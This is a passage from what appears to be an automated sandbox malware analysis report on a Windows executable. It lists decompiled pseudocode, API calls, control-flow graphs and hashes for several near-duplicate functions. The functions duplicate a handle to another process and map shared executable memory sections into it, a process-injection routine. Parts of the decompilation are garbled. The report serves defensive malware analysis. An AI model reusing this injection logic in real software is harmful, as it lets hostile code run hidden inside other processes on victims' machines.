                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                      • Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
                                                                                      • Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
                                                                                      • Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 92 401523-401527 93 401529-40152e 92->93 94 40159f-4015b2 call 4011f5 92->94 93->94 97 4015b4 94->97 98 4015b7-4015bc 94->98 97->98 100 4015c2-4015d3 98->100 101 4018d7-4018df 98->101 104 4018d5 100->104 105 4015d9-401602 100->105 101->98 106 4018e4-40192f call 4011f5 101->106 104->106 105->104 114 401608-40161f NtDuplicateObject 105->114 114->104 116 401625-401649 NtCreateSection 114->116 118 4016a5-4016cb NtCreateSection 116->118 119 40164b-40166c NtMapViewOfSection 116->119 118->104 120 4016d1-4016d5 118->120 119->118 122 40166e-40168a NtMapViewOfSection 119->122 120->104 123 4016db-4016fc NtMapViewOfSection 120->123 122->118 125 40168c-4016a2 122->125 123->104 126 401702-40171e NtMapViewOfSection 123->126 125->118 126->104 129 401724 126->129 129->104 131 401724 call 401729 129->131 131->104
                                                                                      C-Code - Quality: 87%
                                                                                      			E00401523(void* __eax, void* __esi, void* __eflags) {
                                                                                      				long _t89;
                                                                                      				long _t92;
                                                                                      				intOrPtr _t93;
                                                                                      				struct _GUID _t99;
                                                                                      				long _t100;
                                                                                      				struct _GUID _t101;
                                                                                      				long _t102;
                                                                                      				PVOID* _t123;
                                                                                      				long _t124;
                                                                                      				PVOID* _t125;
                                                                                      				long _t126;
                                                                                      				intOrPtr _t129;
                                                                                      				long* _t134;
                                                                                      				void* _t176;
                                                                                      				struct _EXCEPTION_RECORD _t177;
                                                                                      				struct _EXCEPTION_RECORD* _t187;
                                                                                      				intOrPtr* _t189;
                                                                                      				HANDLE* _t190;
                                                                                      				HANDLE* _t191;
                                                                                      				void* _t204;
                                                                                      				void* _t205;
                                                                                      				intOrPtr* _t207;
                                                                                      
                                                                                      				asm("outsd");
                                                                                      				asm("out 0x70, al");
                                                                                      				if(__eflags > 0) {
                                                                                      					L004011F5(_t176, __eflags);
                                                                                      					_t129 =  *((intOrPtr*)(_t205 + 8));
                                                                                      					_t177 = 0;
                                                                                      					 *(_t205 - 0x34) = 0;
                                                                                      					__eflags = gs;
                                                                                      					if(gs != 0) {
                                                                                      						_t4 = _t205 - 0x34;
                                                                                      						 *_t4 =  *(_t205 - 0x34) + 1;
                                                                                      						__eflags =  *_t4;
                                                                                      					}
                                                                                      					while(1) {
                                                                                      						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                      						__eflags = _t89;
                                                                                      						if(_t89 != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                      					}
                                                                                      					 *(_t205 - 0x5c) = _t89;
                                                                                      					_t187 = _t205 - 0x60;
                                                                                      					 *_t187 = _t177;
                                                                                      					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
                                                                                      					_t92 =  *_t187;
                                                                                      					__eflags = _t92;
                                                                                      					if(__eflags != 0) {
                                                                                      						_t134 = _t205 - 0x30;
                                                                                      						 *_t134 = _t92;
                                                                                      						_t134[1] = _t177;
                                                                                      						_t189 = _t205 - 0x28;
                                                                                      						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
                                                                                      						 *_t189 = 0x18;
                                                                                      						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
                                                                                      						if(__eflags == 0) {
                                                                                      							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
                                                                                      							if(__eflags == 0) {
                                                                                      								 *(_t205 - 8) = _t177;
                                                                                      								_t99 = _t205 - 0x50;
                                                                                      								 *(_t99 + 4) = _t177;
                                                                                      								 *_t99 = 0x5000;
                                                                                      								_t190 = _t205 - 0x54;
                                                                                      								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
                                                                                      								__eflags = _t100;
                                                                                      								if(_t100 == 0) {
                                                                                      									 *_t26 =  *(_t205 - 0x50);
                                                                                      									_t123 = _t205 - 0x44;
                                                                                      									 *_t123 = _t177;
                                                                                      									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                      									__eflags = _t124;
                                                                                      									if(_t124 == 0) {
                                                                                      										_t125 = _t205 - 0x3c;
                                                                                      										 *_t125 = _t177;
                                                                                      										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
                                                                                      										__eflags = _t126;
                                                                                      										if(_t126 == 0) {
                                                                                      											_t204 =  *(_t205 - 0x44);
                                                                                      											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
                                                                                      											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
                                                                                      											_t38 = _t205 - 8;
                                                                                      											 *_t38 =  *(_t205 - 8) + 1;
                                                                                      											__eflags =  *_t38;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								_t101 = _t205 - 0x50;
                                                                                      								 *(_t101 + 4) = _t177;
                                                                                      								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
                                                                                      								_t191 = _t205 - 0x58;
                                                                                      								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
                                                                                      								__eflags = _t102;
                                                                                      								if (_t102 != 0) goto L60;
                                                                                      								 *_t102 =  *_t102 + _t102;
                                                                                      								__eflags =  *_t102;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_push(0x15a4);
                                                                                      					_t93 =  *_t207;
                                                                                      					_push(0x83);
                                                                                      					L004011F5(_t177, __eflags);
                                                                                      					return _t93;
                                                                                      				} else {
                                                                                      					asm("popfd");
                                                                                      					asm("repe add al, 0x9b");
                                                                                      					asm("wait");
                                                                                      					asm("wait");
                                                                                      					return __esi;
                                                                                      				}
                                                                                      			}

























                                                                                      0x00401523
                                                                                      0x00401524
                                                                                      0x00401527
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015af
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015ba
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d1
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x00401600
                                                                                      0x00401602
                                                                                      0x0040161d
                                                                                      0x0040161f
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401644
                                                                                      0x00401647
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x00401667
                                                                                      0x0040166a
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x00401685
                                                                                      0x00401688
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016c9
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x0040161f
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f
                                                                                      0x00401529
                                                                                      0x00401529
                                                                                      0x0040152a
                                                                                      0x0040152d
                                                                                      0x0040152e
                                                                                      0x0040152f
                                                                                      0x0040152f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$CreateDuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 3617974760-0
                                                                                      • Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                      • Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
                                                                                      • Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
                                                                                      • Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 174 40158c-4015b2 call 4011f5 178 4015b4 174->178 179 4015b7-4015bc 174->179 178->179 181 4015c2-4015d3 179->181 182 4018d7-4018df 179->182 185 4018d5 181->185 186 4015d9-401602 181->186 182->179 187 4018e4-40192f call 4011f5 182->187 185->187 186->185 195 401608-40161f NtDuplicateObject 186->195 195->185 197 401625-401649 NtCreateSection 195->197 199 4016a5-4016cb NtCreateSection 197->199 200 40164b-40166c NtMapViewOfSection 197->200 199->185 201 4016d1-4016d5 199->201 200->199 203 40166e-40168a NtMapViewOfSection 200->203 201->185 204 4016db-4016fc NtMapViewOfSection 201->204 203->199 206 40168c-4016a2 203->206 204->185 207 401702-40171e NtMapViewOfSection 204->207 206->199 207->185 210 401724 207->210 210->185 212 401724 call 401729 210->212 212->185
                                                                                      C-Code - Quality: 83%
                                                                                      			E0040158C(void* __eax, void* __edi) {
                                                                                      				void* _t89;
                                                                                      				intOrPtr _t91;
                                                                                      				struct _EXCEPTION_RECORD _t94;
                                                                                      				intOrPtr _t95;
                                                                                      				struct _GUID _t101;
                                                                                      				struct _GUID _t103;
                                                                                      				long _t104;
                                                                                      				PVOID* _t125;
                                                                                      				PVOID* _t127;
                                                                                      				intOrPtr _t131;
                                                                                      				struct _EXCEPTION_RECORD* _t136;
                                                                                      				void* _t180;
                                                                                      				struct _EXCEPTION_RECORD _t181;
                                                                                      				struct _EXCEPTION_RECORD* _t189;
                                                                                      				intOrPtr* _t191;
                                                                                      				HANDLE* _t192;
                                                                                      				HANDLE* _t193;
                                                                                      				void* _t206;
                                                                                      				void* _t207;
                                                                                      				void* _t208;
                                                                                      				void* _t210;
                                                                                      				intOrPtr* _t211;
                                                                                      				intOrPtr _t216;
                                                                                      
                                                                                      				_t211 = _t210 + 1;
                                                                                      				asm("clc");
                                                                                      				asm("stc");
                                                                                      				_t89 = _t207;
                                                                                      				_t208 = __eax;
                                                                                      				_t180 = __edi - 1;
                                                                                      				_t2 = _t89 - 0x7d;
                                                                                      				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
                                                                                      				_t216 =  *_t2;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t180, _t216);
                                                                                      				_t131 =  *((intOrPtr*)(__eax + 8));
                                                                                      				_t181 = 0;
                                                                                      				 *((intOrPtr*)(__eax - 0x34)) = 0;
                                                                                      				if(gs != 0) {
                                                                                      					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
                                                                                      					if(_t91 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
                                                                                      				_t189 = _t208 - 0x60;
                                                                                      				 *_t189 = _t181;
                                                                                      				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
                                                                                      				_t94 =  *_t189;
                                                                                      				if(_t94 != 0) {
                                                                                      					_t136 = _t208 - 0x30;
                                                                                      					 *_t136 = _t94;
                                                                                      					 *(_t136 + 4) = _t181;
                                                                                      					_t191 = _t208 - 0x28;
                                                                                      					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
                                                                                      					 *_t191 = 0x18;
                                                                                      					_push(_t208 - 0x30);
                                                                                      					_push(_t191);
                                                                                      					_push(0x40);
                                                                                      					_push(_t208 - 0x10);
                                                                                      					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
                                                                                      						 *(_t208 - 8) = _t181;
                                                                                      						_t101 = _t208 - 0x50;
                                                                                      						 *(_t101 + 4) = _t181;
                                                                                      						 *_t101 = 0x5000;
                                                                                      						_t192 = _t208 - 0x54;
                                                                                      						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
                                                                                      							 *_t28 =  *(_t208 - 0x50);
                                                                                      							_t125 = _t208 - 0x44;
                                                                                      							 *_t125 = _t181;
                                                                                      							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                      								_t127 = _t208 - 0x3c;
                                                                                      								 *_t127 = _t181;
                                                                                      								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
                                                                                      									_t206 =  *(_t208 - 0x44);
                                                                                      									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
                                                                                      									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                      									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t103 = _t208 - 0x50;
                                                                                      						 *(_t103 + 4) = _t181;
                                                                                      						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                      						_t193 = _t208 - 0x58;
                                                                                      						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
                                                                                      						if (_t104 != 0) goto L60;
                                                                                      						 *_t104 =  *_t104 + _t104;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t95 =  *_t211;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t181, _t237);
                                                                                      				return _t95;
                                                                                      			}


























                                                                                      0x0040158c
                                                                                      0x0040158d
                                                                                      0x0040158e
                                                                                      0x0040158f
                                                                                      0x0040158f
                                                                                      0x00401590
                                                                                      0x00401591
                                                                                      0x00401591
                                                                                      0x00401591
                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                      • Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
                                                                                      • Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
                                                                                      • Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 213 401585-4015b2 call 4011f5 220 4015b4 213->220 221 4015b7-4015bc 213->221 220->221 223 4015c2-4015d3 221->223 224 4018d7-4018df 221->224 227 4018d5 223->227 228 4015d9-401602 223->228 224->221 229 4018e4-40192f call 4011f5 224->229 227->229 228->227 237 401608-40161f NtDuplicateObject 228->237 237->227 239 401625-401649 NtCreateSection 237->239 241 4016a5-4016cb NtCreateSection 239->241 242 40164b-40166c NtMapViewOfSection 239->242 241->227 243 4016d1-4016d5 241->243 242->241 245 40166e-40168a NtMapViewOfSection 242->245 243->227 246 4016db-4016fc NtMapViewOfSection 243->246 245->241 248 40168c-4016a2 245->248 246->227 249 401702-40171e NtMapViewOfSection 246->249 248->241 249->227 252 401724 249->252 252->227 254 401724 call 401729 252->254 254->227
                                                                                      C-Code - Quality: 83%
                                                                                      			E00401585() {
                                                                                      				intOrPtr _t86;
                                                                                      				struct _EXCEPTION_RECORD _t89;
                                                                                      				intOrPtr _t90;
                                                                                      				struct _GUID _t96;
                                                                                      				struct _GUID _t98;
                                                                                      				long _t99;
                                                                                      				PVOID* _t120;
                                                                                      				PVOID* _t122;
                                                                                      				intOrPtr _t126;
                                                                                      				struct _EXCEPTION_RECORD* _t132;
                                                                                      				void* _t175;
                                                                                      				struct _EXCEPTION_RECORD _t176;
                                                                                      				struct _EXCEPTION_RECORD* _t185;
                                                                                      				intOrPtr* _t187;
                                                                                      				HANDLE* _t188;
                                                                                      				HANDLE* _t189;
                                                                                      				void* _t202;
                                                                                      				void* _t203;
                                                                                      				void* _t205;
                                                                                      				intOrPtr* _t206;
                                                                                      				void* _t211;
                                                                                      
                                                                                      				_push(0x387);
                                                                                      				_t206 = _t205 + 4;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t175, _t211);
                                                                                      				_t126 =  *((intOrPtr*)(_t203 + 8));
                                                                                      				_t176 = 0;
                                                                                      				 *((intOrPtr*)(_t203 - 0x34)) = 0;
                                                                                      				if(gs != 0) {
                                                                                      					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
                                                                                      					if(_t86 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
                                                                                      				_t185 = _t203 - 0x60;
                                                                                      				 *_t185 = _t176;
                                                                                      				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
                                                                                      				_t89 =  *_t185;
                                                                                      				if(_t89 != 0) {
                                                                                      					_t132 = _t203 - 0x30;
                                                                                      					 *_t132 = _t89;
                                                                                      					 *(_t132 + 4) = _t176;
                                                                                      					_t187 = _t203 - 0x28;
                                                                                      					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
                                                                                      					 *_t187 = 0x18;
                                                                                      					_push(_t203 - 0x30);
                                                                                      					_push(_t187);
                                                                                      					_push(0x40);
                                                                                      					_push(_t203 - 0x10);
                                                                                      					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
                                                                                      						 *(_t203 - 8) = _t176;
                                                                                      						_t96 = _t203 - 0x50;
                                                                                      						 *(_t96 + 4) = _t176;
                                                                                      						 *_t96 = 0x5000;
                                                                                      						_t188 = _t203 - 0x54;
                                                                                      						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                      							 *_t25 =  *(_t203 - 0x50);
                                                                                      							_t120 = _t203 - 0x44;
                                                                                      							 *_t120 = _t176;
                                                                                      							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                      								_t122 = _t203 - 0x3c;
                                                                                      								 *_t122 = _t176;
                                                                                      								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
                                                                                      									_t202 =  *(_t203 - 0x44);
                                                                                      									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
                                                                                      									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
                                                                                      									 *(_t203 - 8) =  *(_t203 - 8) + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t98 = _t203 - 0x50;
                                                                                      						 *(_t98 + 4) = _t176;
                                                                                      						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
                                                                                      						_t189 = _t203 - 0x58;
                                                                                      						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                      						if (_t99 != 0) goto L64;
                                                                                      						 *_t99 =  *_t99 + _t99;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t90 =  *_t206;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t176, _t232);
                                                                                      				return _t90;
                                                                                      			}
























                                                                                      0x00401578
                                                                                      0x00401580
                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
